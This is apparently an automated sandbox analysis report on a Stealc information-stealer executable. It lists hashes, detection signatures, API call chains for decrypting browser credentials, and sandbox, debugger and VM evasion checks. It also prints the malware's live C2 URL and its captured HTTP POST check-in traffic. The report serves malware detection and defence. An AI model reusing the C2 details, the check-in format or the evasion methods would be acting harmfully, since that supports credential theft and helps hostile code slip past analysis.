
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523815
MD5: 2252ee92f584848eac43445204fec9a4
SHA1: 411ee89cbdcd58f985efce1c042d851b391c5643
SHA256: 00f85df4b3b992ef1030c3b26626c3bd961f66eabfc26b9c49d52953415d288b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2252EE92F584848EAC43445204FEC9A4)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2748 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2748 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.540000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T05:02:05.423757+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.540000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php~ | Virustotal: Detection: 15%
Source: http://185.215.113.37/e2b1563c6670f193.phpL | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpd | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php7 | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpK | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------AECFCAAECBGDGDHIEHJE
    Content-Disposition: form-data; name="hwid"

    1A708B8A679D1524750037
    ------AECFCAAECBGDGDHIEHJE
    Content-Disposition: form-data; name="build"

    doma
    ------AECFCAAECBGDGDHIEHJE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------AECFCAAECBGDGDHIEHJE
    Content-Disposition: form-data; name="hwid"

    1A708B8A679D1524750037
    ------AECFCAAECBGDGDHIEHJE
    Content-Disposition: form-data; name="build"

    doma
    ------AECFCAAECBGDGDHIEHJE--
Source: file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174797423.0000000001053000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
Source: file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
Source: file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpft
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37e

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00917995
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090897D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EC2E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2F23F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009143E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F314
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00919458
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00928D9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00910DF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091CE38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090BE41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B1FF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007ADFEA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00904F23
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091AF55
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: hxrvraam ZLIB complexity 0.9949960339065785
Source: file.exe, 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\LXOL8KYC.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1860608 > 1048576
Source: file.exe | Static PE information: Raw size of hxrvraam is bigger than: 0x100000 < 0x1a0200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hxrvraam:EW;mezjsajj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hxrvraam:EW;mezjsajj:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d13cf should be: 0x1cd59f
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: hxrvraam
Source: file.exe | Static PE information: section name: mezjsajj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F082 push 63B32B51h; mov dword ptr [esp], ebp 0_2_0093F0A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E70BE push ebp; mov dword ptr [esp], edx 0_2_008E7114
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E70BE push ebx; mov dword ptr [esp], 549B1673h 0_2_008E711D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F38A9 push ebx; mov dword ptr [esp], edx 0_2_009F38AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097B0CC push edx; mov dword ptr [esp], ecx 0_2_0097B0F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B98C6 push 00CFBED6h; mov dword ptr [esp], ebp 0_2_009B996C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055B035 push ecx; ret 0_2_0055B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0003B push edi; mov dword ptr [esp], ebx 0_2_00A00069
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DB838 push 5BAE3EC3h; mov dword ptr [esp], ebx 0_2_008DB850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DB838 push ecx; mov dword ptr [esp], esi 0_2_008DB859
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DB838 push esi; mov dword ptr [esp], edx 0_2_008DB953
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DB838 push esi; mov dword ptr [esp], 065A1825h 0_2_008DB95C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DB838 push 53A7AFD7h; mov dword ptr [esp], eax 0_2_008DB96B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push eax; mov dword ptr [esp], 1F826F9Ah 0_2_0090D83C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 7FA3C861h; mov dword ptr [esp], eax 0_2_0090D87A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 034445A3h; mov dword ptr [esp], edi 0_2_0090D9AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 1D645F46h; mov dword ptr [esp], edi 0_2_0090D9B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 0A8EA261h; mov dword ptr [esp], eax 0_2_0090DA46
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 09BA91AAh; mov dword ptr [esp], esi 0_2_0090DA55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 1705CA24h; mov dword ptr [esp], edi 0_2_0090DA68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push edi; mov dword ptr [esp], eax 0_2_0090DA8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push edx; mov dword ptr [esp], eax 0_2_0090DA9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push eax; mov dword ptr [esp], 71F5E112h 0_2_0090DBAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push edx; mov dword ptr [esp], eax 0_2_0090DC19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push ebp; mov dword ptr [esp], eax 0_2_0090DC7D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push edx; mov dword ptr [esp], 1C9617C2h 0_2_0090DD05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 63BE7F5Bh; mov dword ptr [esp], edx 0_2_0090DD6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push ebx; mov dword ptr [esp], ecx 0_2_0090DD73
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 66EFC9D1h; mov dword ptr [esp], edx 0_2_0090DDF0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 20BCCB36h; mov dword ptr [esp], ebx 0_2_0090DDFF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090D82C push 29006B6Eh; mov dword ptr [esp], eax 0_2_0090DEAB
Source: file.exe | Static PE information: section name: hxrvraam entropy: 7.954518542392513

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13619
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A20D8 second address: 7A20E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAAC5254A86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1967 second address: 7A1973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A1973 second address: 7A197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A197C second address: 7A1980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9236A6 second address: 9236AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 922622 second address: 922670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FAAC5092E61h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FAAC5092E56h 0x0000001c jmp 00007FAAC5092E69h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 922670 second address: 922676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9227D1 second address: 9227D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 922EF4 second address: 922F04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FAAC5254A86h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 922F04 second address: 922F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jno 00007FAAC5092E56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925CD8 second address: 925CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925CE0 second address: 925CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925CE6 second address: 925D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D1DB0h], esi 0x0000000f push 00000000h 0x00000011 add dword ptr [ebp+122D18A3h], edi 0x00000017 push 417BA398h 0x0000001c push esi 0x0000001d jo 00007FAAC5254A8Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 925D0B second address: 925DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 xor dword ptr [esp], 417BA318h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FAAC5092E58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ecx, edx 0x00000028 push 00000003h 0x0000002a and edx, 2E10935Bh 0x00000030 sub dword ptr [ebp+122D1C7Eh], edi 0x00000036 push 00000000h 0x00000038 mov edi, dword ptr [ebp+122D2CBBh] 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FAAC5092E58h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a or dword ptr [ebp+122D2878h], edx 0x00000060 jmp 00007FAAC5092E62h 0x00000065 call 00007FAAC5092E59h 0x0000006a jmp 00007FAAC5092E60h 0x0000006f push eax 0x00000070 jmp 00007FAAC5092E5Fh 0x00000075 mov eax, dword ptr [esp+04h] 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FAAC5092E67h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925DD2 second address: 925E7C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FAAC5254A98h 0x0000000f jno 00007FAAC5254A9Fh 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jo 00007FAAC5254A98h 0x00000020 push edi 0x00000021 jmp 00007FAAC5254A90h 0x00000026 pop edi 0x00000027 pop eax 0x00000028 jmp 00007FAAC5254A96h 0x0000002d lea ebx, dword ptr [ebp+12457A71h] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FAAC5254A88h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D2148h], edi 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 